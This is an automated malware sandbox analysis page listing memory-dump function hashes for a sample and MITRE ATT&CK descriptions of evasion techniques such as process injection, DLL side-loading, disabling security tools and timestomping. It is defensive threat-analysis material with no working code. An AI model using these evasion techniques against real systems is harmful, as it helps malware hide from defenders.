Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c30136b7d1409400e91152fca6317f208864b430aaf7224f4cdf6b55301f0e
Instruction ID: 02073974df86bd27b3e2994693989a79d9a0802b3b25378fd2fab959eaba29e5
Opcode Fuzzy Hash: 30c30136b7d1409400e91152fca6317f208864b430aaf7224f4cdf6b55301f0e
Instruction Fuzzy Hash: F6319878E01308CFCB45DFA9D58499DBBB6FF49301B205069E819AB364DB35AD46CF00

Function 0169AEF0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c7b7e823cdce2f48351a04d40e884c7acf66eba0927b3f6c01967a331fa019
Instruction ID: 6297b1809372eb378fac58349aad1f9194f2bcc01cfc6a3abfb26f797bfde18b
Opcode Fuzzy Hash: 75c7b7e823cdce2f48351a04d40e884c7acf66eba0927b3f6c01967a331fa019
Instruction Fuzzy Hash: CD215E76A012049FDF149F98DC84AADBBFAFB8C710F144166E916A7394DB71AC11CB90

Function 01699761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99711063ff2ecc47f5977f23ead616e7d2b90c601d2ceb1e0da461d37801a891
Instruction ID: d445411483b9be0bcb5ae1f97818c1f215413a53b11bc7e8e9a110c109986d4a
Opcode Fuzzy Hash: 99711063ff2ecc47f5977f23ead616e7d2b90c601d2ceb1e0da461d37801a891
Instruction Fuzzy Hash: DD218B70E01248DFDF05DFA5D950AEEBFBAEF49308F148069E411AA394DB34D942DB20

Function 0169F312 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4ab0210b1d39a80d00dd3be4406f09c3cd8a77fc7e353c4ad7fff6e71b59c83
Instruction ID: 67fa17b4b2d4772bf4885f9118b49994f7b2b5b98833b6f03f08a2bb4b21c6b9
Opcode Fuzzy Hash: c4ab0210b1d39a80d00dd3be4406f09c3cd8a77fc7e353c4ad7fff6e71b59c83
Instruction Fuzzy Hash: 8A21F9B4D00209DFDB14DFA9D980A9EBFF5FB45301F1486AAC014DB259EB746E4ACB81

Function 016962F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 426db72389097f5d8fa7707e81d9351cefd075df2cbb895a35232211f21d04d4
Instruction ID: 6eddcacf76f2eda0ccd8b12f0edd42600678ac514ae798acbe09c14df6aa5b90
Opcode Fuzzy Hash: 426db72389097f5d8fa7707e81d9351cefd075df2cbb895a35232211f21d04d4
Instruction Fuzzy Hash: 3911E3353066118FDB155B2DD86492EBBA6BF8536131940AAE506DB364DF25DC02C790

Function 016927F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968eeee88598bd50e621f7638c4a52785e67aa09ae46fe8ed3221402bf30acd1
Instruction ID: d8cfd63863ef30397106911ed9ff04e542d898ae02863471c5d022f85d1f2f30
Opcode Fuzzy Hash: 968eeee88598bd50e621f7638c4a52785e67aa09ae46fe8ed3221402bf30acd1
Instruction Fuzzy Hash: 5C21E074C052098FCF04EFA8D9545EEBFF4FF0A300F1052AAD805B6228EB351A85CBA1

Function 0169F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3921165296e0332002db281d4d47a829c98e0f8a2136f1a1df54cabeb8698185
Instruction ID: b83e7924039c6fb324857e8d9a35f84a0cea1388a8e64457eed37ee50109c0fe
Opcode Fuzzy Hash: 3921165296e0332002db281d4d47a829c98e0f8a2136f1a1df54cabeb8698185
Instruction Fuzzy Hash: FF110AB4D00209DFEB14EFA9D540B9EBFF6FB44304F1086A9C0189B254EB745E4ACB81

Function 01695E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb4bf99ce6429b3367561a4f21f02686f10e25c02f6f7f4511b3cba7514bb05
Instruction ID: 5266c78a0f68ad9011dc61dd9ce57852ed3e4d02fba77000f0e32accec8866e3
Opcode Fuzzy Hash: 3eb4bf99ce6429b3367561a4f21f02686f10e25c02f6f7f4511b3cba7514bb05
Instruction Fuzzy Hash: B401F9326011545FDF02DF58EC10AAE3FEAEBC9350F04805BF905CB384CA758C119791

Function 0169E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f90ee39d3238e89e2ef713fac04ac03efc3047625eccebcebe2e462c0aa6e6
Instruction ID: 095ec67b1d0180f12ef8ec1340bff4156e729ba312dc9f3e236c57ba581311b0
Opcode Fuzzy Hash: 05f90ee39d3238e89e2ef713fac04ac03efc3047625eccebcebe2e462c0aa6e6
Instruction Fuzzy Hash: 92113574D0030AEFCB01CFA8E844AAEBBB1FB89310F00846AD910A3350D3345A56CF90

Function 0169ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b69e82322e84e30817c1a436c9efc23594ae5e6c33def6a6f71b0d1bb4ada3
Instruction ID: 9962cf1869cb17afa0f048b23ce19f2cf2e38890a2227f46db974da8a8f23c68
Opcode Fuzzy Hash: a8b69e82322e84e30817c1a436c9efc23594ae5e6c33def6a6f71b0d1bb4ada3
Instruction Fuzzy Hash: DBF096353006508B9B166A6EDC54A2ABADEEFC8A55315407EE905CB365EF21CC038790

Function 01699C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b5a35b20c1e57c715452ec4f48f44f803e5c12486592e2da78387c6ff4053a
Instruction ID: 65ce6189584c164090949619e788a99a7160685cb7733fc856cceac73d5cd9d9
Opcode Fuzzy Hash: 66b5a35b20c1e57c715452ec4f48f44f803e5c12486592e2da78387c6ff4053a
Instruction Fuzzy Hash: A9F06732A001589FDF01DF69DC88AEABBB5EF89325F05806AE908CB215D3358915CB91

Function 016928A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f3847f78cab3bcc6281510fa0cb28fa273765473c64ca84098c30fef415e8d
Instruction ID: 9f9798620c811829672908b65d0cee8bd177c68ef8eb17e874df54e5fbb7db9b
Opcode Fuzzy Hash: a6f3847f78cab3bcc6281510fa0cb28fa273765473c64ca84098c30fef415e8d
Instruction Fuzzy Hash: 32E02635D243A58FCB02E7B49C201EDBF34AE8731275A86D3C4607B191EB312668C3A2

Function 01696739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf40f8a150bf94e4883b48be22827abdee6fb618c347f76fdbdda63079553f7a
Instruction ID: 78b46232934f679a25e6f792b3a6d2f58f33218501014f3752c1deb919ed9a07
Opcode Fuzzy Hash: bf40f8a150bf94e4883b48be22827abdee6fb618c347f76fdbdda63079553f7a
Instruction Fuzzy Hash: 7FE012314083A68FDB13FB75ECA45553FBAFEA22007048991D0058E56EDEB87C4B8B63

Function 016928B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2db67a1317298cf83db107d30a1e11ca30a56e083013cc31d6c24020fd48b8
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 5a2db67a1317298cf83db107d30a1e11ca30a56e083013cc31d6c24020fd48b8
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 0169D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21485bafd5003ec384203a337a873d8f59de830418e067b142156ad02a3210c9
Instruction ID: 93d25bc68dfbc845d6fbf2858d484cbf746b4fe9ada4edaedb6f783064b120f6
Opcode Fuzzy Hash: 21485bafd5003ec384203a337a873d8f59de830418e067b142156ad02a3210c9
Instruction Fuzzy Hash: B1D04235E15109CBCF20EFA9E4844DCFBB1EB49222F10502BD925A3252D63454558F51

Function 0169AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0ab56a0ae10cae469a9b49a95fcfb13cee47787ac13ee8d8a52f625af0b26b
Instruction ID: f7c2564036f8c92ec017f401d44fedbfa91bb0815f7fe1e17239131c3ec2b082
Opcode Fuzzy Hash: 8f0ab56a0ae10cae469a9b49a95fcfb13cee47787ac13ee8d8a52f625af0b26b
Instruction Fuzzy Hash: CCD0673AB010089FCB149F98E8409DDF776FB98221B448117F915A3264C6319965DB64

Function 01696748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1e9da19827dde5a14294a92bc45cd6f8437bac44a21a89e909a9e68c23b88
Instruction ID: a09161cd03f1a4a557d1c8c9324e1a1567565014d41da708b49434f0ad65f2a6
Opcode Fuzzy Hash: 1df1e9da19827dde5a14294a92bc45cd6f8437bac44a21a89e909a9e68c23b88
Instruction Fuzzy Hash: A2C0123540431A4FD501F772FC54515376AB6E01057408510D0050D65DDE7C7C8B4791

Non-executed Functions

Function 06DB0040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6d9aec2f3b4d805c6fd5e1dd4a3910df6adea11b3970f7f7b74c7bce1e23c9
Instruction ID: eb739405ff91da216530f337db2f73ea457474a8b11eaf61f1f64c34bfaf7bdb
Opcode Fuzzy Hash: 2d6d9aec2f3b4d805c6fd5e1dd4a3910df6adea11b3970f7f7b74c7bce1e23c9
Instruction Fuzzy Hash: CF527874E01229CFDB64DF69D984BDEBBB2BB89301F1081EAD409A7254DB359E81CF50

Function 0169F631 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73de04bb450e9dedd49fd28733a945654771b906990fc8beab108d3a834d6cc1
Instruction ID: 8ed77dc0cc3e54281081240e513e15d266774d6e3e21d7e23320a85b761821a8
Opcode Fuzzy Hash: 73de04bb450e9dedd49fd28733a945654771b906990fc8beab108d3a834d6cc1
Instruction Fuzzy Hash: 9AC1AD74E00218CFDB54DFA9D984B9DBBB6FB89300F2081A9D809AB355DB359E85CF50

Function 0169FA88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f641437dfa6da40a91ffa17bc7bfc03cf80a55ff62eacc929e67156a2b2e021b
Instruction ID: 8905a298e60a61e195338f8953bdb537a6513945e3c11ee8705faf043cfde108
Opcode Fuzzy Hash: f641437dfa6da40a91ffa17bc7bfc03cf80a55ff62eacc929e67156a2b2e021b
Instruction Fuzzy Hash: 11C19C74E00218CFDB54DFA9D994B9DBBB2FB89300F2081A9D809AB355DB359E85CF50

Function 06DBE6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db9b3cf7c01b6f00d162e002462a802be798a592c28e369caeed62a2dc5b1aa
Instruction ID: 87f0fc0995b25baa3ea4c7733cab8b4793e842652dcd2e7bc2184d4fd31d80b9
Opcode Fuzzy Hash: 2db9b3cf7c01b6f00d162e002462a802be798a592c28e369caeed62a2dc5b1aa
Instruction Fuzzy Hash: 87C17B74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D409AB354DB359E85CF50

Function 06DBE258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7d7bfdda368586e999abe58e538fc6ce54bb648b5ec383633fac9d1eafdb5e
Instruction ID: ee3e2a08556bbafd9d0b9bf199c523fe6202bddfabc2608c8c518807496bd436
Opcode Fuzzy Hash: 4e7d7bfdda368586e999abe58e538fc6ce54bb648b5ec383633fac9d1eafdb5e
Instruction Fuzzy Hash: 91C19C74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D409AB358DB359E85CF50

Function 06DBDE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6b3d1aee185025cf2e58491355aa23a9ab9ba9c0fe26470d96f3618a6befda
Instruction ID: e743db58be5aa9533647f9b543b309e080433580153769c0e1f1f383b3156d5c
Opcode Fuzzy Hash: 9b6b3d1aee185025cf2e58491355aa23a9ab9ba9c0fe26470d96f3618a6befda
Instruction Fuzzy Hash: 37C18D74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D809AB354DB359E85CF50

Function 06DBF3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a87eb8b7ba7fa5b2b1cf79e282c897b485a75e0f1a0ed0dbc8a7ea0c002e05f8
Instruction ID: a319d059dac0e22ec5efbd430d0c98daa87837fbaef51ca7b8baa7e8da8b86d4
Opcode Fuzzy Hash: a87eb8b7ba7fa5b2b1cf79e282c897b485a75e0f1a0ed0dbc8a7ea0c002e05f8
Instruction Fuzzy Hash: D2C18C74E00318CFDB54DFA9D994B9DBBB2EB89300F2090A9D809AB354DB359E85CF50

Function 06DBEF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f354294e659831188c4bd7c716ba84a1b7eb256df67227c7110d048c2b8a155
Instruction ID: 6134f289e28dadc3e20d1f54f34c9423b41d7e88ec5350b389214ee066790c77
Opcode Fuzzy Hash: 2f354294e659831188c4bd7c716ba84a1b7eb256df67227c7110d048c2b8a155
Instruction Fuzzy Hash: D4C18C74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D409AB358DB359E85CF50

Function 06DBEB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844a4e30ab82b5026ac4fa83e43f5c54000b350e32825ace84b94e7eae989d1e
Instruction ID: c6cf5abce094358f1537829cb97ee3af6f8a256de62d64bbb9dccf3444bbf832
Opcode Fuzzy Hash: 844a4e30ab82b5026ac4fa83e43f5c54000b350e32825ace84b94e7eae989d1e
Instruction Fuzzy Hash: C4C18C74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D809AB354DB359E85CF50

Function 06DBD0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91de968eddfd145ee59e7cbffaab5460f17ef91a8bfe323079c3032124325f9e
Instruction ID: 3c468864bf601640fec1558260eae49fdc782821dd43a0067220a86f9ea3e2fa
Opcode Fuzzy Hash: 91de968eddfd145ee59e7cbffaab5460f17ef91a8bfe323079c3032124325f9e
Instruction Fuzzy Hash: 5AC19D74E00218CFDB54DFA9D994B9DBBB2EF89300F2090A9D409AB358DB359E85CF50

Function 06DBCCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbcf926a7d4a11597b64093d27be768c7ad1236ec6e2016cc8dd3e0e27f99711
Instruction ID: 27e0b6b3899ff9b3c6493356f510a6d750bea29bbac150c9a28a5583ec112627
Opcode Fuzzy Hash: fbcf926a7d4a11597b64093d27be768c7ad1236ec6e2016cc8dd3e0e27f99711
Instruction Fuzzy Hash: 37C18C74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D809AB354DB359E85CF50

Function 06DBF810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7f4870b77f1907a1926f3c5b5a71876a5d9e3f485d4b33658b38723c094cba
Instruction ID: ca0df5249998d036f27a5b535ae0544139d4c87f910666657c7b3a71694f0f0d
Opcode Fuzzy Hash: 4a7f4870b77f1907a1926f3c5b5a71876a5d9e3f485d4b33658b38723c094cba
Instruction Fuzzy Hash: C2C18C74E00218CFDB54DFA9D994B9DBBB2FB89300F2091A9D809AB354DB359E85CF50

Function 06DBD9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e59eaba11921024b0b28c94e2d94c58a813c9b06e6cfd03da7e4671a1ab61004
Instruction ID: 8ef547b30f230b73c309369c9414bdb40ff777cdcae02843b7d2cc766b5eee97
Opcode Fuzzy Hash: e59eaba11921024b0b28c94e2d94c58a813c9b06e6cfd03da7e4671a1ab61004
Instruction Fuzzy Hash: C0C19C74E01318CFDB54DFA9D994B9DBBB2EF89300F2090A9D409AB258DB359E85CF50

Function 06DBD550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a9eabdfcef080314a16a483db8baba7d40b3121ddd2fbb39f8ad128fd8e148
Instruction ID: fd3563d4c87b3d63832e099389fb6aa32d2b8add67d21fa08353db3506eadc18
Opcode Fuzzy Hash: e1a9eabdfcef080314a16a483db8baba7d40b3121ddd2fbb39f8ad128fd8e148
Instruction Fuzzy Hash: 48C19C74E00218CFDB54DFA9D994B9DBBB2FF89300F2090A9D409AB254DB359E85CF50

Function 01696920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 0169695E
\;q, xrefs: 0169692C
\;q, xrefs: 01696952
\;q, xrefs: 01696936

Memory Dump Source

Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 83e73333dde4f9419ab70754d70ee8217ed797bbf33acd680024f9ac97c8b4d6
Instruction ID: 2b4f6139b8ef6be0bc87372686a39875575ea9c770b7bbab4b6770c72832c8fe
Opcode Fuzzy Hash: 83e73333dde4f9419ab70754d70ee8217ed797bbf33acd680024f9ac97c8b4d6
Instruction Fuzzy Hash: 5001A7317003268FDF258A2DC940A6577EEBF887A5719416AE906CB371DB71EC428790

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
